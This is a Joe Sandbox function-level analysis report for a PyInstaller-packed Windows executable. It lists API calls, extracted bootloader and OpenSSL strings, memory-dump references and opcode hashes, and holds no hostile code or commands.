Function 00007FF6BA3AEED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF6BA3AEF37
_CallSETranslator.LIBVCRUNTIME ref: 00007FF6BA3AEF83

Strings

MOC, xrefs: 00007FF6BA3AEF4B
RCC, xrefs: 00007FF6BA3AEF53

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction ID: 6c9147d962ba8ae164ee0ea4d38bc82be3823770e0fbe3674d08b2fc712afde7
Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction Fuzzy Hash: DF617F32908BD586EB709B19E4403AEB7A1FB85B94F144265EF9C83B99DF7CD194CB00

Function 00007FF6BA3A7E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF6BA3A352C,?,00000000,00007FF6BA3A3F23), ref: 00007FF6BA3A7F32

Strings

%s%c, xrefs: 00007FF6BA3A7EA4
\, xrefs: 00007FF6BA3A7E97
%.*s, xrefs: 00007FF6BA3A7EEB

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
Instruction ID: f29f0fb67ac1866a42dd6160b06a30ee706c458277aba1d7a05b8fdeca8e2c85
Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
Instruction Fuzzy Hash: 0531C221619AD545EF219B29E8507AE639AEF84BE0F440271EF6DC7BC9EF3CD6418700

Function 00007FF6BA3A2810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF6BA3A28EA

Strings

Error, xrefs: 00007FF6BA3A28DD
[PYI-%d:%ls] , xrefs: 00007FF6BA3A2868
ERROR, xrefs: 00007FF6BA3A286F

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction ID: 3242eb4e7a23a38344cd68c91a2b22a657e0197ac3394b977aafa74767134204
Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction Fuzzy Hash: FC21A172B08B5182E7109B59F8847EA73A5FB88780F404136EF8DD7666EE3CD245C740

Function 00007FF6BA3BC5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF6BA3BC61F
WriteFile.KERNEL32 ref: 00007FF6BA3BC8E7
WriteFile.KERNEL32 ref: 00007FF6BA3BC92D
GetLastError.KERNEL32 ref: 00007FF6BA3BC9E3

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction ID: 0ef953d58a3e27de98cccb82c67664fab58bd63d88ef1e527bfa9560445a74cb
Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction Fuzzy Hash: 21D11672B18A8189E721CF79D4402AC77B2FB59798B884276DF5ED7B99DE38D406C300

Function 00007FF6BA3BF98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6BA3BFA7C
_get_daylight.LIBCMT ref: 00007FF6BA3BFA8D
_get_daylight.LIBCMT ref: 00007FF6BA3BFA9E
_isindst.LIBCMT ref: 00007FF6BA3BFB69

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction ID: 139b0b010e53845ffc32afde63b358dd77c2607c0f7643788c5621ac30eed665
Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction Fuzzy Hash: 6C51D272F04A118BEB18CF6C99556BC27A2AB44369F901375DF1ED2AE5DF39E406C700

Function 00007FF6BA3B577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF6BA3B57AF
GetFileInformationByHandle.KERNEL32 ref: 00007FF6BA3B5811
GetLastError.KERNEL32 ref: 00007FF6BA3B58A2
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BA3B56B4), ref: 00007FF6BA3B58EE

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
Instruction ID: 5ab84bcfd6b32d117b449bbad918289ce3c76e6614392b6939ed3afa7ea1916f
Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
Instruction Fuzzy Hash: 61514922F08A418AFB50DF79D4503BD37A2AB48B98F549675EF4ADB689DF38D4818700

Function 00007FF6BA3A20C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF6BA3A20F4
SetWindowLongPtrW.USER32 ref: 00007FF6BA3A2116
GetWindowLongPtrW.USER32 ref: 00007FF6BA3A2140
InvalidateRect.USER32 ref: 00007FF6BA3A2160

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: 7679ec17063924541901481bf07df1987c0fea6410c096e0297fb8c568833bea
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: 9911C821F1C16682FE549BAEE9852BD5293EF88780F888071DF49C7BA9DD3DD8D58700

Function 00007FF6BA3C5B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BA3C1760: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C1793

_get_daylight.LIBCMT ref: 00007FF6BA3C5C34
_get_daylight.LIBCMT ref: 00007FF6BA3C5C45

Strings

?, xrefs: 00007FF6BA3C5BC5

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
Instruction ID: ca5cb5ad417d3bb251627e950f2dad7a2e7761b76c1909dad9a2ef81bbb3bdd3
Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
Instruction Fuzzy Hash: EA411622A087A246FB648B29E80137A6B61EF80BA4F144275EF5DC7AD6EF3CD4418700

Function 00007FF6BA3B9014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B9046

Part of subcall function 00007FF6BA3BA948: RtlFreeHeap.NTDLL(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA95E
Part of subcall function 00007FF6BA3BA948: GetLastError.KERNEL32(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA968

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6BA3ACBA5), ref: 00007FF6BA3B9064

Strings

C:\Users\user\Desktop\El9HaBFrFM.exe, xrefs: 00007FF6BA3B9052

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\El9HaBFrFM.exe
API String ID: 3580290477-1581088161
Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
Instruction ID: 7e97badaa0ccaea44ec8ca81f79f4ba403a3b2c33def53094e1d1ff2d40dba6a
Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
Instruction Fuzzy Hash: E2417E72A08F1686EB14DF29A8900BD67A6EF847D0B9541B5EF4EC3B95DF3CE4818300

Function 00007FF6BA3BCC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF6BA3BCD4F
GetLastError.KERNEL32 ref: 00007FF6BA3BCD71

Strings

U, xrefs: 00007FF6BA3BCCFB

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction ID: 8b2636ecf5a37c6a28ec54cecb3cde6a02ebede1cd60dc86711ab11c39cbc8b5
Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction Fuzzy Hash: C241C232B18B9581DB608F29E8443AA67A5FB98784F844135EF4DC7798EF3CD441CB40

Function 00007FF6BA3BF5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF6BA3BF5F8
GetCurrentDirectoryW.KERNEL32 ref: 00007FF6BA3BF64A

Strings

:, xrefs: 00007FF6BA3BF60E

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
Instruction ID: fcb5bf7002bc9c5c43ccbfa54844a0bbe3d333a9f6fcb63af7fcece02c784686
Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
Instruction Fuzzy Hash: 5E21F872A08A4181EB649B19D44427D73B2FB84B44F858279DF8DC3694DF7DD548C741

Function 00007FF6BA3AFD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF6BA3AFD98
RaiseException.KERNEL32 ref: 00007FF6BA3AFDD9

Strings

csm, xrefs: 00007FF6BA3AFDC6

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction ID: 580b3386c56f74526aea9c4e6018cf4d7d0a842e23dddda4bd2515111dc8cf6b
Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction Fuzzy Hash: 4B111C32618B9182EB618F19F840259B7E5FB88B88F584270DF8D87768EF3DD555C740

Function 00007FF6BA3C073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C076C
GetDriveTypeW.KERNEL32 ref: 00007FF6BA3C07AC

Strings

:, xrefs: 00007FF6BA3C0795

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction ID: 66112ebc79a8769491d7d8a4283cd90d670ab3743ab5ce09253566f55c7b284a
Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction Fuzzy Hash: C901F22291C76386FB64AF68986127E23A0EF49744F800176DF4CC3681EF3CE440CB08

Analysis Process: El9HaBFrFM.exePID: 7532, Parent PID: 7516COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.1%
Total number of Nodes:	935
Total number of Limit Nodes:	60

Executed Functions

Function 00007FF6BA3A1000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 511
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF6BA3A3EA6
Failed to start splash screen!, xrefs: 00007FF6BA3A3ED4
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF6BA3A3971
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF6BA3A39DE
bye-runtime-tmpdir, xrefs: 00007FF6BA3A3B68
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF6BA3A3B32
Failed to remove temporary directory: %s, xrefs: 00007FF6BA3A3FCF
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF6BA3A3BE8
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF6BA3A3D12
_PYI_ARCHIVE_FILE, xrefs: 00007FF6BA3A38D2, 00007FF6BA3A39FF
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF6BA3A3A17, 00007FF6BA3A3A2F, 00007FF6BA3A3A9B
pkg, xrefs: 00007FF6BA3A39BE
pyi-contents-directory, xrefs: 00007FF6BA3A3B8D
MEI, xrefs: 00007FF6BA3A3933
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF6BA3A3EBB
pyi-python-flag, xrefs: 00007FF6BA3A3AD6
_PYI_SPLASH_IPC, xrefs: 00007FF6BA3A3A23, 00007FF6BA3A3EF5
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF6BA3A3E0A
VCRUNTIME140.dll, xrefs: 00007FF6BA3A3DB1
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF6BA3A3A0B, 00007FF6BA3A3CD4, 00007FF6BA3A3F6B
Could not create temporary directory!, xrefs: 00007FF6BA3A3CBF
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF6BA3A3D35
Failed to convert DLL search path!, xrefs: 00007FF6BA3A3DDC
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF6BA3A3C61
Py_GIL_DISABLED, xrefs: 00007FF6BA3A3AF4
Failed to load splash screen resources!, xrefs: 00007FF6BA3A3E85
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF6BA3A3882, 00007FF6BA3A38AF
pyi-disable-windowed-traceback, xrefs: 00007FF6BA3A3BB2

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
API String ID: 2776309574-3273434969
Opcode ID: 233ec7f25ec1ed803ce179537cd482b57a2e4efc6b2dbb8e538fcab84ef42543
Instruction ID: 5769df13d4cb34b5a81c5f9880665c6c37022f6ebf483ec7a09b1a9e68fcb9e4
Opcode Fuzzy Hash: 233ec7f25ec1ed803ce179537cd482b57a2e4efc6b2dbb8e538fcab84ef42543
Instruction Fuzzy Hash: 33326A26E0CBA291FF199B29D8553BD66A2AF44780F8440B6DF5DC32D6EF2CE559C300

Function 00007FFDFAAB1A0F Relevance: 23.6, APIs: 5, Strings: 8, Instructions: 858COMMON

Download Yara Rule

Strings

..\s\ssl\record\ssl3_record.c, xrefs: 00007FFDFAAFACF8, 00007FFDFAAFAEA7, 00007FFDFAAFB01D, 00007FFDFAAFB06B, 00007FFDFAAFB09B, 00007FFDFAAFB0C8, 00007FFDFAAFB0F5, 00007FFDFAAFB1A2, 00007FFDFAAFB1EB, 00007FFDFAAFB330, 00007FFDFAAFB358, 00007FFDFAAFB38F, 00007FFDFAAFB3C4, 00007FFDFAAFB445, 00007FFDFAAFB489, 00007FFDFAAFB4AB, 00007FFDFAAFB74F, 00007FFDFAAFB7CE, 00007FFDFAAFB7FB, 00007FFDFAAFB828, 00007FFDFAAFB861, 00007FFDFAAFB88E, 00007FFDFAAFB97F, 00007FFDFAAFB9B9, 00007FFDFAAFBA27, 00007FFDFAAFBA5D
, xrefs: 00007FFDFAAFB187
CONNE, xrefs: 00007FFDFAAFB95A
ssl3_get_record, xrefs: 00007FFDFAAFACF1, 00007FFDFAAFAEA0, 00007FFDFAAFB016, 00007FFDFAAFB064, 00007FFDFAAFB094, 00007FFDFAAFB0BC, 00007FFDFAAFB0E9, 00007FFDFAAFB196, 00007FFDFAAFB1DF, 00007FFDFAAFB324, 00007FFDFAAFB34C, 00007FFDFAAFB3B8, 00007FFDFAAFB439, 00007FFDFAAFB593, 00007FFDFAAFB743, 00007FFDFAAFB7C2, 00007FFDFAAFB7EF, 00007FFDFAAFB821, 00007FFDFAAFB855, 00007FFDFAAFB887, 00007FFDFAAFB973, 00007FFDFAAFB9AD, 00007FFDFAAFBA20, 00007FFDFAAFBA51
